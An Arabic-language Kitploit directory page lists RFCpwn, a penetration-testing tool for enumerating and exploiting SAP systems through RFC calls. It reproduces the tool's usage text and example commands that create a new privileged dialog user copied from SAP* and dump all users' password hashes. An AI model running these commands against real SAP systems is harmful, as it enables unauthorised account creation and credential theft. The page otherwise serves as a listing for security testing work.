Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
RFCpwn — أداة تعداد واستغلال تستخدم استدعاءات RFC لـ SAP | Kitploit
أدوات/GitHubGitHub/icryo/rfcpwn
كسر كلمات المرورتحليل الثغرات الأمنيةالاستغلالجمع المعلوماتاختبار الاختراق
GitHubicryo/rfcpwn

RFCpwn

أداة تعداد واستغلال تستخدم استدعاءات RFC لـ SAP

عرض المستودع
40114منذ 6 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

RFCpwn

مجموعة أدوات لاستكشاف واستغلال SAP باستخدام استدعاءات RFC

Twitter: @icryo

هذه مجموعة أدوات لإظهار تأثير اختراق حسابات الخدمة.

إثبات المفهوم هذا ليس للاستخدام في بيئات الإنتاج، ولا يوجد ضمان للاستقرار أو الدعم.

RFCpwn يعتمد على pyrfc والمكتبات المقدمة من SAP في: https://github.com/SAP/PyRFC#installation

root@kitploit:~
usage: RFCpwn.py [-h] [-debug] [-ip IP] [-u Username] [-p Password]
                   [-c Client] [-s Sysid] [-ping] [-enum] [-usercopy]
                   [-user USER] [-copy COPY] [-pw PW] [-dump] [-exp]

An Impacket style enumeration and exploitation tool using SAP RFC calls

optional arguments:
  -h, --help   show this help message and exit
  -debug       Turn DEBUG output ON

Authentication:
  -ip IP       <targetName or address>
  -u Username  RFC Users Username
  -p Password  RFC Users Password
  -c Client    Client- eg.000
  -s Sysid     System Number- eg 00
  -ping        RFC Ping Command

User Abuse:
  -enum        Use to enumerate a specific user
  -usercopy    add a Dialog User
  -user USER   Required for -usercopy and -userenum to specify the user
  -copy COPY   User to be copied required for -usercopy
  -pw PW       password of new user for -usercopy

Hash Collection:
  -dump        Dump hashes use with below
  -exp         EXPERIMENTAL - Dump BCODE / PASSCODE hashes

أمثلة

اختبار الاتصال

root@kitploit:~
./RFCpwn.py -ip 192.168.200.253 -s 00 -c 000 -u RFCUser -p RFCPass -ping

نسخ صلاحيات مستخدم إلى مستخدم حوار جديد. إذا لم يتم تحديد -copy، يتم استخدام SAP*.

root@kitploit:~
./RFCpwn.py -ip 192.168.200.253 -s 00 -c 000 -u RFCUser -p RFCPass -usercopy -user attacker -pw changeme1

تفريغ التجزئات من جميع المستخدمين. الخيار -exp للتجزئات التجريبية bcode وpasscode.

root@kitploit:~
./RFCpwn.py -ip 192.168.200.253 -s 00 -c 000 -u RFCUser -p RFCPass -dump 

Demo

Imgur Image

تنزيل الأداة